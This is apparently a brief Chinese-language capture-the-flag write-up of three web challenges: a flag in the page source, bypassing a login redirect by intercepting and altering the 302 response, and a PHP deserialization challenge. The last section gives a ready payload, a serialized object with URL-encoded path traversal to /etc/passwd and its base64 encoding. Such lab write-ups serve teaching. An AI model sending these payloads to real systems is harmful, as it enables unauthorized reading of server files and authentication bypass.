Triplet
在源码处有现成的
Lock Out
每次我们登录不成功就会重定向一个flag页面,我们可以拦截他的响应,来获取flag,这边有两种方法。
0x01
加上PrintFlag参数,我们可以看到在302页面有个get传。
0x02
勾选上此选项
然后就可拦截响应并修改了,我们把302页面改为200,在发送,然后在页面上点击printflag就行了。
Serial Killer
抓包可以看到一串经过base64编码的序列化。
解码后可以看到访问文件处。
O:7:"GetPage":1:{s:4:"file";s:10:"index.html";}
并且他对/
过滤了,我们可以url编码,再base64编码
O:7:"GetPage":1:{s:4:"file";s:27:"..%2F..%2F..%2Fetc%2Fpasswd";}
Tzo3OiJHZXRQYWdlIjoxOntzOjQ6ImZpbGUiO3M6Mjc6Ii4uJTJGLi4lMkYuLiUyRmV0YyUyRnBhc3N3ZCI7fQ==